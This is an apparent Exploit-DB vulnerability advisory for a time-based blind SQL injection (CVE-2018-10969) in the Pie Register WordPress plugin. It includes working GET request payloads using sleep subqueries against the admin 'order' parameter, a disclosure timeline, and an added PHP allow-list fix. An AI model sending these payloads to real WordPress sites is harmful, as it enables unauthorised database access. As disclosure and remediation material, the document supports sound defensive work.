WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection

11 Jun 2018 | Reported by Manuel García Cárdenas | Type: exploitdb | Source: www.exploit-db.com

Blind SQL injection vulnerability found in WordPress Plugin Pie Register 3.0.9, allowing SQL injection in invitation_code_pagination.ph

# Title: WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection
# Author: Manuel García Cárdenas
# Date: 2018-05-10
# Software: WordPress Plugin Pie Register 3.0.9
# CVE: CVE-2018-10969

# I. VULNERABILITY
# WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection

# II. BACKGROUND
# Pie-Register is a quick and easy way to brand your Registration Pages on
# WordPress sites.

# III. DESCRIPTION
# This bug was found using the portal, in the following file:
# /pie-register/classes/invitation_code_pagination.php:    if ( isset( $_GET['order'] ) && $_GET['order'] )
# /pie-register/classes/invitation_code_pagination.php:    $order = $_GET['order'];
# When the query is executed, the parameter "order" is not sanitized.
# /pie-register/classes/invitation_code_pagination.php:    $this->order = esc_sql( $order );

# IV. PROOF OF CONCEPT
# The following URLs have all been confirmed to suffer from time-based SQL injection.

GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc
(original)

GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a) HTTP/1.1
(2 seconds of response)

GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a) HTTP/1.1
(30 seconds of response)

# V. SYSTEMS AFFECTED
# Pie Register <= 3.0.9

# VI. DISCLOSURE TIMELINE
# May 10, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
# May 10, 2018 2: Sent to vendor, without response
# June 05, 2018 3: Second email to vendor, without response
# June 11, 2018 4: Sent to the Full-Disclosure lists

# VII. SOLUTION
# Disable plugin until a fix is available
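
Section III shows "order" passing through esc_sql() before it reaches the query; quote escaping does not constrain a value that is used as an ORDER BY keyword rather than inside a quoted string, so the durable fix is an allow-list. The PHP below is an added example, not code from Pie Register or from the original advisory: the helper names and the column list are assumptions, and addslashes() stands in for quote escaping so the script runs without WordPress.

```php
<?php
// Added example: hypothetical helpers, not code from Pie Register or WordPress.

// The sort direction is a SQL keyword, not a string literal, so it is
// matched against a fixed list instead of being escaped.
function example_order_direction( $raw, $default = 'ASC' ) {
    $value = strtoupper( trim( (string) $raw ) );
    return in_array( $value, array( 'ASC', 'DESC' ), true ) ? $value : $default;
}

// Column names get the same treatment: only known columns pass.
function example_order_column( $raw, array $allowed, $default ) {
    $value = strtolower( trim( (string) $raw ) );
    return in_array( $value, $allowed, true ) ? $value : $default;
}

// Constructed inputs: the benign value and the decoded value from section IV.
$samples = array( 'desc', 'desc,(select*from(select(sleep(2)))a)' );
$columns = array( 'name', 'created' ); // assumed column list

foreach ( $samples as $input ) {
    // Stand-in for quote escaping. The second sample contains no quotes,
    // so escaping returns it unchanged and it would reach the query intact.
    $escaped = addslashes( $input );

    // Allow-list: the second sample is not ASC or DESC, so the default is used.
    $direction = example_order_direction( $input );
    $column    = example_order_column( 'name', $columns, 'name' );

    printf( "input:      %s\n", $input );
    printf( "escaped:    ORDER BY %s %s\n", $column, $escaped );
    printf( "allow-list: ORDER BY %s %s\n\n", $column, $direction );
}
```

For the second sample the escaped line still carries the full subquery, while the allow-list line reads ORDER BY name ASC.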
